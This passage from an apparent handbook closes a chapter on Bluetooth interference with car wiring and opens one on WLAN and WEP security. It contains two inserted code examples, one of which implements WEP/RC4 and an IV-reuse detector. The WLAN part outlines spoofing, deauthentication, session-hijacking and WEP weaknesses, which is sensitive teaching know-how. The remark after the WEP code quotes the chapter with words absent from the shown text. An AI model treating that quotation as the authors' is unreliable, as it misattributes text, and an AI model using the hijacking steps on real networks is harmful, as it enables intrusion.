is 1990 µA in contrast with the value of 1870 µA experimentally obtained. Besides, one can see in Table 2 the comparison between simulated and experimental induced current when the emission frequency is changed for three Bluetooth devices (class I, II, and III) at a distance of 5 cm and a height of 0.6 cm.

On the other hand, Table 3 shows some of the measurements obtained in the laboratory corresponding to the current induced by the transmitter located at a distance of 2 cm and 5 cm from the cable, and at a height above the ground plane of 0.6 cm. The same table shows the increase in the induced current due to the effect of different power class transmitters (class I, II, and III).

To conclude, Figure 5 shows the electric field levels that the structure being tested is submitted to in order to induce the same RF currents as those produced if a Bluetooth transmitter is situated in near field. The setup used for the test is the one

Table 1. Values of the induced current obtained by simulation and experimentally as a function of the transmitter distance (frequency 2425 MHz and height 0.6 cm)

Power transmission     Distance   Wire induced current
(Bluetooth devices)    (cm)       Simulation (µA)   Measurement (µA)
+20 dBm (Class I)      2          1990              1870.0
                       5          879               715.3
                       8          337               378.0
+4 dBm (Class II)      2          315               319.5
                       5          139               123.0
                       8          53.3              62.2
0 dBm (Class III)      2          200               203.4
                       5          87.7              78.8
                       8          33.5              43.3

Table 2. Values of the induced current obtained by simulation and experimentally as a function of the transmitter frequency (distance 5 cm and height 0.6 cm)

Power transmission     Frequency   Induced current
(Bluetooth devices)    (MHz)       Simulation (µA)   Measurement (µA)
+20 dBm (Class I)      2400        921               827.0
                       2425        879               715.3
                       2450        941               604.0
                       2475        1060              645.0
+4 dBm (Class II)      2400        145               142.8
                       2425        139               123.0
                       2450        148               104.8
                       2475        167               111.7
0 dBm (Class III)      2400        91.1              90.8
                       2425        87.7              78.8
                       2450        93.8              67.5
                       2475        105               71.28


Table 3. Measurement of the induced current as a function of the frequency and of the Bluetooth transmitter location (height 0.6 cm)

Power transmission     Frequency   Measured induced current
(Bluetooth devices)    (MHz)       Distance 2 cm (µA)   Distance 5 cm (µA)
+20 dBm (Class I)      2400        1974                 827.0
                       2425        1870                 715.3
                       2450        1772                 604.0
                       2475        1862                 645.0
+4 dBm (Class II)      2400        335.7                142.8
                       2425        319.5                123.0
                       2450        301.6                104.8
                       2475        331.5                111.7
0 dBm (Class III)      2400        213.3                90.8
                       2425        203.5                78.8
                       2450        193.0                67.5
                       2475        203.0                71.28

Figure 5. Intensity of the electric field, according to the described test, that induces on the cable under test the same current as Bluetooth transmitters working with variable distance and power (dBm)

shown in Figure 4 (down). For example, a class I transmitter (+20 dBm) located at a distance of 5 cm and at a height of 0.6 cm induces a current of 715 µA. In the same way, this transmitter situated at a distance of 2 cm induces a current of 1870 µA. Identical current values are induced when the wire loaded by resistances of 50 Ω is exposed to a uniform plane wave with an electric field level of 42.3 V/m and 122 V/m, respectively.
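The Bluetooth channel plan and power classes described at the start of the chapter, the spectrum-analyser-to-current conversion of the proposed method, and the current-to-field equivalence reported in these results, as one worked example added here (not code from the chapter or its authors; all function names are the example's own). It embeds the chapter's Table 1 values and its 42.3 V/m and 122 V/m anchor points; the assumption that a 50 Ω analyser reading converts to current by P = I²R, and the linear current-to-field scaling used to estimate the other rows, are the example's, not the chapter's.

```python
"""Worked numbers behind the chapter: Bluetooth channel plan and power classes,
spectrum-analyser reading -> induced current, and the Table 1 simulation vs
measurement data compared against the 2004/104/EC field levels. Table values
and the 42.3 V/m / 122 V/m anchors are the chapter's; everything derived from
them by linear scaling is an assumption of this example."""
import math

BAND_LOW_MHZ, BAND_HIGH_MHZ = 2400.0, 2483.5  # ISM band used by Bluetooth
LOWER_GUARD_MHZ, UPPER_GUARD_MHZ = 2.0, 3.5   # guard bands quoted in the chapter
NUM_CHANNELS = 79                             # 1 MHz spacing
DIRECTIVE_WHOLE_BAND_V_M = 25.0               # 2004/104/EC: 25 V/m whole band
DIRECTIVE_90PCT_BAND_V_M = 30.0               # and 30 V/m over 90 % of it

# Bluetooth power classes as listed in the chapter: class -> (mW, dBm)
BT_CLASSES = {"I": (100.0, 20.0), "II": (2.5, 4.0), "III": (1.0, 0.0)}

# Chapter Table 1 at 2425 MHz, 0.6 cm height:
# (class, distance cm) -> (FEKO simulation uA, measurement uA)
TABLE_1 = {
    ("I", 2): (1990.0, 1870.0), ("I", 5): (879.0, 715.3), ("I", 8): (337.0, 378.0),
    ("II", 2): (315.0, 319.5), ("II", 5): (139.0, 123.0), ("II", 8): (53.3, 62.2),
    ("III", 2): (200.0, 203.4), ("III", 5): (87.7, 78.8), ("III", 8): (33.5, 43.3),
}

# Plane-wave levels the chapter reports as inducing the same current as a
# class I transmitter at 5 cm (715 uA) and 2 cm (1870 uA): (current uA, V/m)
FIELD_ANCHORS = ((715.3, 42.3), (1870.0, 122.0))


def channel_frequency_mhz(k: int) -> float:
    """Carrier of RF channel k: F(MHz) = 2402 + k, k = 0..78."""
    if not 0 <= k < NUM_CHANNELS:
        raise ValueError("Bluetooth channel index must be in 0..78")
    return BAND_LOW_MHZ + LOWER_GUARD_MHZ + k


def guard_bands_consistent() -> bool:
    """79 channels at 1 MHz plus the 2 / 3.5 MHz guard bands must fill the band."""
    lowest, highest = channel_frequency_mhz(0), channel_frequency_mhz(NUM_CHANNELS - 1)
    return (math.isclose(lowest - BAND_LOW_MHZ, LOWER_GUARD_MHZ)
            and math.isclose(BAND_HIGH_MHZ - highest, UPPER_GUARD_MHZ))


def dbm_to_mw(p_dbm: float) -> float:
    return 10.0 ** (p_dbm / 10.0)


def mw_to_dbm(p_mw: float) -> float:
    return 10.0 * math.log10(p_mw)


def induced_current_ua(reading_dbm: float, load_ohm: float = 50.0) -> float:
    """Analyser power reading (dBm into its 50 ohm input) -> cable current in uA.
    The analyser terminates the cable, so P = I^2 * R and I = sqrt(P / R)."""
    p_w = dbm_to_mw(reading_dbm) / 1000.0
    return math.sqrt(p_w / load_ohm) * 1e6


def analyser_reading_dbm(current_ua: float, load_ohm: float = 50.0) -> float:
    """Inverse of induced_current_ua: the dBm reading a given current produces."""
    i_a = current_ua * 1e-6
    return mw_to_dbm(i_a * i_a * load_ohm * 1000.0)


def relative_error(bt_class: str, distance_cm: int) -> float:
    """(simulation - measurement) / measurement for one Table 1 cell."""
    sim, meas = TABLE_1[(bt_class, distance_cm)]
    return (sim - meas) / meas


def scaling_error(class_a: str, class_b: str, distance_cm: int,
                  column: str = "simulation") -> float:
    """Deviation of the current ratio between two classes from sqrt(P_a / P_b).
    Induced current follows the field, and the field the square root of the
    transmitted power, so the ratio should track the class power ratio."""
    idx = 0 if column == "simulation" else 1
    ratio = TABLE_1[(class_a, distance_cm)][idx] / TABLE_1[(class_b, distance_cm)][idx]
    expected = math.sqrt(BT_CLASSES[class_a][0] / BT_CLASSES[class_b][0])
    return ratio / expected - 1.0


def equivalent_field_range_v_m(current_ua: float) -> tuple:
    """Estimated plane-wave field (V/m) inducing current_ua, as (low, high).
    Assumption: field and induced current scale linearly, so each anchor gives
    one V/m-per-uA factor; the two anchors differ by ~10 %, hence a range."""
    factors = [field / current for current, field in FIELD_ANCHORS]
    return (current_ua * min(factors), current_ua * max(factors))


def risk_versus_directive(current_ua: float) -> str:
    """'above' if even the low estimate exceeds the 30 V/m test level,
    'below' if even the high estimate stays under 25 V/m, else 'marginal'."""
    low, high = equivalent_field_range_v_m(current_ua)
    if low > DIRECTIVE_90PCT_BAND_V_M:
        return "above"
    if high < DIRECTIVE_WHOLE_BAND_V_M:
        return "below"
    return "marginal"


def table_1_assessment() -> dict:
    """Classify every measured Table 1 cell against the directive levels."""
    return {key: risk_versus_directive(meas) for key, (_, meas) in TABLE_1.items()}


if __name__ == "__main__":
    for key, verdict in sorted(table_1_assessment().items()):
        print(key, verdict)
```

Running it shows that only the two class I rows at 2 cm and 5 cm land above the directive's test levels, while the simulated currents for any two classes differ by the square root of their power ratio to within 1 %, which is the linearity the chapter's far-field equivalence relies on.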
Future Works

Once the above shown results are analysed, the authors suggest continuing to evaluate the electromagnetic field generated by these kinds of wireless communication devices and others alike, varying the setup conditions (relative cable and antenna location, cables, different antennas transmitting simultaneously, etc.). All this is done comparing the results obtained from the simulation tools as well as from the experimental tests in the EMC laboratory.

It would also be interesting to study and evaluate the amplifying effect due to the metallic structure of the cabin, measuring inside and outside the vehicle.

Conclusion

From the simulated and experimental results obtained by this work, it can be deduced that the electromagnetic interference supported by the cable structure under study, when situated a few centimetres from a commercial Bluetooth transmitter, is similar to the action of a plane wave with electric field levels superior to those specified by directive 2004/104/EC (25 or 30 V/m). Comparing the magnitude of the electric fields obtained in the present analysis with the real values at which on board electronic components are tested in accordance with the EMC directive, it can be deduced that Bluetooth transmitters of 20 dBm can cause electromagnetic susceptibility problems in the vehicle's electronic and electrical systems, which would not be detected during the radiated susceptibility test according to a valid EMC directive for automobiles.

In short, more consideration should be given to the electromagnetic interference generated by Bluetooth devices as they get closer to electrical and electronic circuits whose performance they can affect, and even more so in confined spaces where multiple sources of interference coexist, as is the situation with automobiles. The effect of increasing the power of the transmitter or reducing the distance between it and the wired elements of the automobile is equivalent to submitting them to increasing electric far-field levels in radiated susceptibility tests in accordance with the 2004/104/EC EMC directive, which increases the risk of a failure in the system.

This work lends support to the need for the prevailing EMC directive to be modified in order to assess and ensure the electromagnetic compatibility of automobiles' on board systems in the presence of wireless devices with a frequency range above 2.0 GHz.

Acknowledgment

This work has been possible thanks to the support of the Centre of High Technology and Homologation (CATECHOM) at the University of Alcala (UAH), as well as the COVE Project funded by the Spanish Science and Education Ministry, TRA2005-05409/AUT and TRA2006-12105/TAIR.

References

2004/104/EC EMC. (2004). Directive relating to the radio interference of vehicles. Commission of the European Communities.

95/54/EC EMC. (1995). Directive relating to the radio interference of vehicles. Commission of the European Communities.

Bannatyne, R. (2000, May). The sensor explosion and automotive control systems. Sensors Magazine, 17(5).


Campos, F.T., Mills, N.W., & Graves, M.L. (2002). A reference architecture for remote diagnostics and prognostics applications. In Proceedings of the IEEE Autotestcon (pp. 842-853).

CISPR 12. (2001). Vehicles, boats and internal combustion engine driven devices. Radio disturbance characteristics. Limits and methods of measurement for the protection of receivers except those installed in the vehicle/boat/device itself or in adjacent vehicles/boats/devices. The International Special Committee on Radio Interference (CISPR).

CISPR 25. (2002). Radio disturbance characteristics for the protection of receivers used on board vehicles, boats, and on devices. Limits and methods of measurement. The International Special Committee on Radio Interference (CISPR).

FCAI. (1997). Federal Chamber of Automotive Industries (FCAI). Retrieved October 15, 2007, from http://www.dcita.gov.au/Article/0,,0_4-2_4008-4_10465,00.html

FEKO. (2005). EM software & systems. FEKO. Retrieved October 15, 2007, from http://www.feko.info/

ISO 11452-2. (2004). Road vehicles: Component test methods for electrical disturbances from narrowband radiated electromagnetic energy. Part 2: Absorber-lined shielded enclosure. The International Organization for Standardization (ISO).

ISO 7637-2. (2004). Road vehicles: Electrical disturbance from conduction and coupling. Part 2: Electrical transient conduction along supply lines only on vehicles with nominal 12 V or 24 V supply voltage. The International Organization for Standardization (ISO).

Kerry, P.J. (2003). EMC in the European Union. IEEE. 0-7803-7779-6/03.

Kun, A., Lenharth, W., & Millar, W.T. (2004). Project 54. Durham: University of New Hampshire. Retrieved October 15, 2007, from http://www.project54.unh.edu/

Larses, O. (2003). Modern automotive electronics from an OEM perspective (Tech. Rep. KTH S-100 44). Royal Institute of Technology, Mechatronics Lab, Department of Machine Design, Stockholm.

Leen, G., & Heffernan, D. (2002, January). Expanding automotive electronic systems. IEEE Computer, 35(1), 88-93.

Mazo, M., Espinosa, F., Awawdeh, A.M.H., & Gardel, A. (2005). Automotive electronics diagnosis: State of the art and next tendencies. FITSA, Madrid. Retrieved October 15, 2007, from http://www.fundacionfitsa.org/fitsa/pub/Libro%20diagnosis%20electronica.pdf

Renault. (2006). Renault EMC unit. Aubevoye, France. Retrieved October 15, 2007, from http://www.worldcarfans.com/news.cfm/newsid/2060406.004/country/ecf/Renault-inaugurates-emc-unit

Schoof, A., Stadtler, T., & Haseborg, J.L. (2003, May 11-16). Simulation and measurement of the propagation of Bluetooth signals in automobiles. Paper presented at the 2003 IEEE International Symposium, EMC'03 (pp. 1297-1300).

SIG. (2006). Specification of the Bluetooth system. Retrieved October 15, 2007, from http://www.bluetooth.com

SparkFun. (2005). Transceiver MiRF - Miniature RF 2.4GHz. Retrieved October 15, 2007, from http://www.sparkfun.com/commerce/product_info.php?products_id=135

Stadtler, T., Schoof, A., & Haseborg, J.L. (2002, September 9-13). Electromagnetic compatibility of a system under the influence of a Bluetooth transmitter. Paper presented at the Symposium EMC Europe 2002, Sorrento.

Tatoian, J. (2005). Car chases zapped. Pasadena, California: Eureka Aerospace. Retrieved October 15, 2007, from http://www.defensetech.org/archives/001369.html


Key Terms

Anechoic (Semianechoic) Chamber: An anechoic chamber is a room in which there are no echoes. This description was originally used in the context of acoustic (sound) echoes caused by reflections from the internal surfaces of the room, but more recently the same description has been adopted for the radio frequency (RF) anechoic chamber. An RF anechoic chamber is designed to suppress the electromagnetic wave analogy of echoes: electromagnetic waves reflected, again, from the internal surfaces. Both types of chamber are usually built, not only with echo suppression features, but also with effective isolation from the acoustic or RF noise present in the external environment. In a well designed acoustic or RF anechoic chamber the equipment under test will only receive signals (whether acoustic or RF) which are emitted directly from the signal source, and not reflected from another part of the chamber. The semianechoic chamber is a shielded room with radio frequency absorbing material on the walls and ceiling (not on the ground). This semianechoic chamber simulates an open field test site, and eliminates any ambient signals that may be present in an open field environment.

Bluetooth (Class I, II, and III): Bluetooth is the name of a wireless technology standard for connecting devices, set to replace cables. It uses radio frequencies in the 2.45 GHz range to transmit information over short distances of generally 33 feet (10 meters) or less. By embedding a Bluetooth chip and receiver into products, cables that would normally carry the signal can be eliminated. There are currently three flavours or classifications of Bluetooth devices, relative to transmitting range. As the range is increased the signal used in the respective classification is also stronger. Note that class III devices are comparatively rare.

Class      Signal Strength      Range
Class I    100 mW (+20 dBm)     Up to 328 feet (100 meters)
Class II   2.5 mW (+4 dBm)      Up to 33 feet (10 meters)
Class III  1 mW (0 dBm)         Up to 33 feet (10 meters)

CISPR: The Special International Committee on Radio Interference (abbreviated CISPR from the French name of the organization, Comité international spécial des perturbations radioélectriques) is concerned with developing norms for detecting, measuring and comparing electromagnetic interference in electric devices. CISPR's principal task is at the higher end of the frequency range, from 9 kHz upwards, preparing standards that offer protection of radio reception from interference sources such as electrical appliances of all types, the electricity supply system, industrial, scientific and electromedical RF, broadcasting receivers (sound and TV) and, increasingly, information technology equipment (ITE).

EMC-EMI-EMS: EMC is an abbreviation for electromagnetic compatibility. This means interoperability, or an electronic device's ability to operate in an electric environment without interfering with other electronic devices (emission), and without being interfered with by other devices in its vicinity (immunity). EMC is divided into two main areas: electromagnetic interference (EMI) and electromagnetic susceptibility (EMS). These two areas are again divided into two categories of phenomena: conducted phenomena and radiated phenomena. EMC testing comprises measurements of the emission generated on in- and outgoing cables, the emission generated as electric field surrounding the device, immunity against several disturbance phenomena on in- and outgoing cables, immunity against electric fields generated by other electronic devices and radio transmitters, and immunity against electrostatic discharges generated by human intervention.

Near Field Communication (NFC): A short-range wireless connectivity standard (Ecma-340, ISO/IEC 18092) that uses magnetic field induction to enable communication between devices when they are touched together, or brought within a few centimetres of each other. Jointly developed by Philips and Sony, the standard specifies a way for the devices to establish a peer-to-peer (P2P) network to exchange data. After the P2P network has been configured, another wireless communication technology, such as Bluetooth or Wi-Fi, can be used for longer range communication or for transferring larger amounts of data.

RF: Short for radio frequency, any frequency within the electromagnetic spectrum associated with radio wave propagation. When an RF current is supplied to an antenna, an electromagnetic field is created that is then able to propagate through space. Many wireless technologies are based on RF field propagation, including cordless phones, radar, ham radio, GPS, and radio and television broadcasts. RF waves propagate at the speed of light, or 186,000 miles per second (300,000 km/s). Their frequencies, however, are lower than those of visible light, making RF waves invisible to the human eye.

WLAN: The acronym for wireless local-area network. Also referred to as LAWN. A type of local-area network that uses high-frequency radio waves rather than wires to communicate between nodes. A LAN is a computer network that spans a relatively small area. Most LANs are confined to a single building or group of buildings. However, one LAN can be connected to other LANs over any distance via telephone lines and radio waves. A system of LANs connected in this way is called a wide-area network (WAN).




Chapter XLIII
Security in WLAN

Mohamad Badra
Bât ISIMA, France

Artur Hecker
INFRES-ENST, France

Abstract

The great promise of wireless LAN will never be realized unless there is an appropriate security level. From this point of view, various security protocols have been proposed to handle wireless local-area network (WLAN) security problems that are mostly due to the lack of physical protection in WLAN or because of the transmission on the radio link. The purpose of this chapter is (1) to provide the reader with a sample background in WLAN technologies and standards, (2) to give the reader a solid grounding in common security concepts and technologies, and (3) to identify the threats and vulnerabilities of WLAN communications.

WLAN Standards and Technologies, Benefits and Use Cases

IEEE 802.11/wireless local-area network (WLAN) technologies (WLAN, 2003) have evolved phenomenally over the last few years. They have been widely deployed in a variety of network environments and they properly converge with actual Internet and 3G infrastructures.

IEEE 802.11 refers to a set of specifications for WLAN developed by IEEE. It specifies an over-the-air interface between a mobile station (STA) and a base station as well as between two mobile stations. Basically, WLAN networks can be seen as extensions of wired Ethernet networks. WLAN leverages on a set of newest digital communications technologies to make it possible to establish a local area network for computer communications without the use of cables.

IEEE approved the first 802.11 standard in 1997. This version is limited to only 1 and 2 Mbps data rates. Subsequently in 1999, 802.11a and 802.11b were approved, expanding to new radio bands (changing the usage of the 2.4 GHz ISM band and adding usage of the 5 GHz UNII band) and increasing the available data rates to 54 Mbps and 11 Mbps, respectively. Consequently, large deployments of

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
802.11 WLAN started being rolled out, especially in enterprises to replace or extend the wired local-area network (LAN) with an implementation of WLAN, and in airports and various business venues where they installed several WLAN access points offering a public Internet access (so-called hotspots), which can range from a small covered zone to many square miles of overlapping hotspots in metropolitan areas.

While the most obvious advantage of the WLAN is mobility, there are also other benefits:

• Installing and maintaining flexibility: Installation of a WLAN system is fast and easy and eliminates the terminal cabling costs. It extends to areas where wires cannot be installed.
• Apparent ease of use: WLAN is easy for novice and expert users alike, eliminating the need for a large knowledge to take advantage of WLAN.
• Transparency: WLAN is transparent to the user network, allowing applications to work in the same way as they do in wired LANs.
• Scalability: WLANs are designed to be simple or complex; they range from networks suitable for a small number of nodes to full infrastructure networks of thousands of nodes and large physical area by adding access points to extend coverage and to provide users with roaming between different areas.

WLAN was developed to extend wired LAN wirelessly and therefore to minimize Ethernet cabling. It was designed to provide “data obscurity” equivalent to that provided by wired Ethernet with easier installation. However, there are some differences between WLAN and wired LAN due to the constraints introduced by the former, especially the shared medium, interference, the collisions that cannot be detected reliably, the physical boundary that is difficult to control, and the signal itself.

These differences make WLAN security harder to maintain in comparison to wired LAN. In WLAN, it is possible for an attacker to snoop on confidential communications or modify them to gain access to the network much more easily than in the wired LAN. The open access to the networks permits malicious action at a distance and simplifies passive interception. The temptation for unauthorized access and eavesdropping is also a reality (Khan & Khwaja, 2003) because an attacker could easily access the transport medium. This is not easy in wired LAN due to the physical access to the media. WLANs have introduced a new security threat, sometimes referred to as the parking lot attack (Arbaugh, 2003) (i.e., a person with a wireless computer and a makeshift antenna can gain access to your WLAN from hundreds of feet away). Other security issues are mostly because of the lack of physical protection of the wireless network access or of the transmission on the radio that cannot be confined to the walls of an organization.

The original 802.11 standard defines authentication and encryption mechanisms based on the use of the wired equivalent privacy (WEP) protocol. Unfortunately, this protocol suffers from serious design flaws (Miller & Hamilton, 2002). Furthermore, it does not define a key management mechanism; it presumes that the secret key is conveyed between WLAN entities through a secure channel independent of 802.11 WLAN. As a result of different flaws discovered in WEP, the security of WLAN has been widely studied, and a set of standards have been developed by IEEE and IETF, especially 802.1X (802.1X, 2004), 802.11i (802.11i, 2004) and extensible authentication protocol (EAP) (Aboba, Blunk, Vollbrecht, Carlson, & Levkowetz, 2004). The 802.1X standard has been standardized by the 802.1 working group. 802.1X was initially conceived to securely manage the access to different IEEE 802.1 networks. It is a framework for authenticating and controlling user traffic at the network level, as well as dynamically exchanging encryption keys between a mobile station and an authentication server. By pushing the authentication method to the virtual layer, 802.1X defines an open security architecture, which principally allows user authentication and, optionally, session key generation and derivation on a per-user and per-session basis. Because of this possibility for dynamic provisioning, 802.1X is used as the common base in the current WLAN

security suites such as Wi-Fi protected access (WPA) (WPA, 2003) and IEEE 802.11i (802.11i, 2004).

The rest of the chapter presents a more detailed description of the various WLAN standards from the security perspective: challenges and possible attacks in WLAN security; WLAN infrastructure security; authentication, authorization, and access control; confidentiality and privacy; and key management and establishment.

WLAN Management Frames

A WLAN network is formed by entities called stations (STA). A WLAN can operate in two modes: infrastructure and ad hoc. In the ad hoc mode, each STA communicates directly with other stations. In the infrastructure mode, stations communicate with each other via a special STA, called access point (AP). Each AP additionally has a connection to the distribution system (DS), which can take different forms (wireless, wired, OSI layer, etc.). In this chapter, we focus on the infrastructure mode.

The infrastructure mode extends the range of the wired LAN. It introduces a notion of basic service set (BSS). Each BSS is formed by an AP and associated stations, and can be roughly understood as a WLAN equivalent of a cell (a base station and mobile nodes). It is uniquely identified by the medium access control (MAC) address of the STA of its AP, called BSSID. By using their DS connection, several APs can allow a station to move from one BSS to another. Several BSSs may be collected, constructing an extended service set (ESS). The identifier of the ESS is a case sensitive string of 32 bytes (ESSID), and can be roughly understood as a “network name.” In the infrastructure mode, it is usually called SSID for convenience.

One of the primary services of WLAN management frames is to provide access control reliability. This was done originally based on a predetermined set of MAC addresses and improved later with 802.1X. The access control usually implements a way to provide authentication or authorization to a terminal attached to the network. WLAN uses a concept called port-based access control that is based on the notion of a port. The port-based access control blocks all traffic on a (logical) port until some condition is true. The condition for the port opening is a successful user association and authentication.

An association precedes each communication between the STA and the AP. The association is formed between a STA and an AP by exchanging messages, by means of so-called management frames, allowing both STA and AP to create and to maintain the association states. WLAN defines three states: unauthenticated and unassociated, authenticated and unassociated, and authenticated and associated.

The management frames can be started by the STA sending a probe request management frame to find an AP affiliated with a selected ESSID, or by scanning the beacon management frame broadcast by the APs at a fixed interval. As part of the association process, the STA and the access point perform an authentication. IEEE 802.11 originally defines two authentication modes, the open system authentication (OSA), practically equivalent to no authentication, and shared key authentication (SKA), a simple challenge handshake protocol based on a preshared key between the STA and the AP and the specified WEP protocol. Furthermore, other methods can be used to restrict the access to an AP, such as classical MAC address filtering (whitelisting or blacklisting STA MAC addresses) and the suppression of service advertisement, usually called SSID hiding.

It must be noted that neither of these methods can be considered sufficiently secure given the current usage of the 802.11 technology. Since MAC addresses need to be transported in clear and can be easily changed, MAC address filtering is not enough of a barrier. SSID hiding can only work as long as nobody uses the service, since the associating STA will try to solicit an AP under a given SSID, thus effectively disclosing this “secret.” The included SKA scheme lacks mutuality and is way too static (no session key derivation, no key management) to be applicable in an operational industrial environment. Accidentally, SKA was


found to be misconceived, effectively rendering it useless. The details of these findings will be discussed in the next sections.

WLAN Security Essentials

The 802.11 standard defines an optional encryption scheme to protect data streams exchanged over-the-air between the STA and the AP. This scheme, called WEP, was designed to prevent unauthorized access to the wireless LAN traffic. It uses the stream cipher RC4 for confidentiality equivalent to a traditional wired network, and a CRC-32 checksum for integrity protection. The shared key authentication type requires WEP support.

The 802.11 standard does not define how to distribute shared keys to the equipment in the network. In other words, WEP key management and distribution is outside the scope of 802.11.

WEP-Based Authentication

The first feature of WEP is to prevent unauthenticated users from gaining access to the WLAN network. A STA attempting to gain access to the network must send an authentication frame containing, among others, its asserted identity to the AP, which replies with another authentication frame transporting a challenge text. The device encrypts the challenge text using WEP with the shared key and its own initialization vector (IV), concatenates the encrypted output to the IV, and sends the result to the AP:

STA → AP: Authentication Request (STA asserted identity)
AP → STA: Challenge
STA → AP: WEP(Challenge, IV, Key) = Challenge XOR RC4(IV | Key)
AP → STA: Success <or> Reject.

Using the same key, the AP decrypts the response and verifies that the decrypted text matches the challenge text it sent to the device, before accepting or denying device access to the network.

WEP Confidentiality and Data Integrity

WEP uses a 40-bit key that is concatenated to a 24-bit IV to form the traffic key. The resulting key is used as an input to the RC4 pseudo-random number generator (PRNG) to generate a pseudo-random key sequence.

When a device encrypts data using WEP, it calculates the integrity check value (ICV) over the data to be sent (the ICV is implemented as a 32-bit CRC). The device concatenates the data and the ICV before the result is XORed with the key sequence (in a typical stream cipher manner).

Upon reception, the AP retrieves the IV from the arrived packet to generate the same pseudo-random key sequence. Then, the AP XORs the key sequence to the received frames and computes the ICV of the decrypted text, comparing it to the ICV of the received packet. If the two ICVs do not match, the AP sends an error indication to the sender.

Note that due to interference, out-of-order or lost-packet rates are plausible within 802.11 communication channels. Therefore, and in order to ensure the so-called self-synchronisation property, WEP uses a per-packet RC4 key and generates a separate keystream per packet. For that, WEP concatenates a per-packet IV to the WEP key.

Issues in WLAN Security

Due to the shared nature of the wireless medium, it is easy to create associations with unprotected wireless networks. Consequently, unauthorized STAs are able to launch attacks on a wireless network, for example, to affect the WLAN performance or to get an Internet access, as well as on another STA to eavesdrop on its established association. Attacks are classified as active and passive.

A passive attack is an attack where an unauthorized attacker monitors or listens on the communication between two or more parties. Active attacks have the possibility of inflicting undetected corruption on the data in transit by manipulating the cipher text in special ways that do not change its built-in cyclic redundancy checks.
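The WEP frame processing and the shared key authentication exchange described above, written out as an added example (this is not code from the chapter; RC4 and the CRC-32 ICV are implemented as the chapter describes them). It also includes the check a monitoring system would run over captured frames: because WEP keys a fresh RC4 keystream only by the 24-bit IV prepended in the clear, two frames under the same BSSID and IV share a keystream, and the birthday bound shows how few frames that takes. The BSSID labels, key and payloads are constructed sample values.

```python
import zlib
from collections import defaultdict
from math import pi, sqrt

IV_LEN = 3          # 24-bit per-packet IV, sent in the clear in front of the ciphertext
WEP40_KEY_LEN = 5   # 40-bit shared key


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 PRNG: key-scheduling algorithm (KSA) followed by the PRGA."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """Integrity check value: an unkeyed CRC-32 over the plaintext (little-endian on the wire)."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Frame body = IV || (data || ICV) XOR RC4(IV || key), the per-packet traffic key."""
    if len(key) != WEP40_KEY_LEN or len(iv) != IV_LEN:
        raise ValueError("WEP-40 needs a 5-byte key and a 3-byte IV")
    body = data + icv(data)
    return iv + xor_bytes(rc4_keystream(iv + key, len(body)), body)


def wep_decrypt(key: bytes, frame: bytes):
    """Receiver side: rebuild the keystream from the clear IV, strip the ICV and check it.
    Returns the plaintext, or None when the ICV does not match (the AP's error path)."""
    iv, ciphertext = frame[:IV_LEN], frame[IV_LEN:]
    body = xor_bytes(rc4_keystream(iv + key, len(ciphertext)), ciphertext)
    data, tag = body[:-4], body[-4:]
    return data if tag == icv(data) else None


def ska_response(key: bytes, iv: bytes, challenge: bytes) -> bytes:
    """Station's third message of shared key authentication: WEP(Challenge, IV, Key)."""
    return wep_encrypt(key, iv, challenge)


def ska_verify(key: bytes, challenge: bytes, response: bytes) -> bool:
    """AP side: decrypt with the same key and compare with the challenge it sent."""
    return wep_decrypt(key, response) == challenge


def find_iv_reuse(frames):
    """Monitoring check over captured (bssid, frame) pairs: returns {(bssid, iv): [indexes]}
    for every IV seen more than once under one BSSID. Each hit is a keystream reuse."""
    seen = defaultdict(list)
    for idx, (bssid, frame) in enumerate(frames):
        seen[(bssid, frame[:IV_LEN])].append(idx)
    return {k: v for k, v in seen.items() if len(v) > 1}


def expected_frames_until_iv_collision(iv_bits: int = 8 * IV_LEN) -> int:
    """Birthday bound sqrt(pi/2 * 2^n): frames a monitor should expect before the first
    repeated randomly chosen IV (about 5,000 for the 24-bit WEP IV)."""
    return round(sqrt(pi / 2 * 2 ** iv_bits))
```

Running `find_iv_reuse` over a capture is the practical form of the chapter's remark that the IV "will be repeated with sufficient frequency": the key itself never changes between frames, so a repeated IV means the same RC4 keystream was applied twice, which is why 802.11i replaced this construction rather than lengthening the IV alone.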


WLAN devices broadcast their MAC addresses over-the-air and it is therefore easy to observe the MAC address of an associated mobile station and spoof it to masquerade as a legitimate device.

Due to the nature of WLAN, intruders can flood the open medium access and are able to execute denial-of-service attacks (DoS) to bring down WLAN access or services. An attacker may launch denial-of-service attacks by spoofing, replaying, or generating management frame packets.

Another problem related to the open medium is jamming WLAN frequencies. Jamming against WLAN is almost impossible to prevent and can be executed easily as noise or interference on channels that deliver WLAN services. For example, in a military environment, jammers are often located in helicopters as the line-of-sight propagation gives them an advantage over communication transmitters located on the ground (Stahlberg, 2000).

WLANs are also vulnerable to session hijacking attacks due to the lack of authentication of the management frames as well as to the WLAN state machines. Session hijacking is a combination of DoS and identity spoofing attacks and it can be launched by 1) eavesdropping on the medium to discover the MAC address of a legitimate station and/or of the AP, 2) deauthenticating the legitimate station to terminate its connection to the AP (spoofing STA or spoofing AP addresses), and 3) using the eavesdropped MAC to reauthenticate to a different or to the same AP on the same WLAN.

WEP Weaknesses

Shared key authentication was designed to help in reducing attacker activities against WLAN. Unfortunately, WEP has turned out to be much less secure than intended. Fluhrer, Mantin, and Shamir’s (2001) paper entitled “Weaknesses in the Key Scheduling Algorithm of RC4” describes how an attacker can intercept transmissions and gain unauthorized access to wireless networks. Other problems are related to the insufficient IV length (thus permitting to decrypt frames without key knowledge), absent key management (on the one hand resulting in manual settings and typically weaker alphanumeric keys, and on the other hand directly exposing the long term secret), and to the absent message integrity checking (the available CRC32 integrity does not depend upon the keys and mainly targets transmission problems; it is therefore possible to alter a packet whose content was known even if it had not been decrypted). More information on WEP attacks may be found in Borisov, Goldberg, and Wagner (2001).

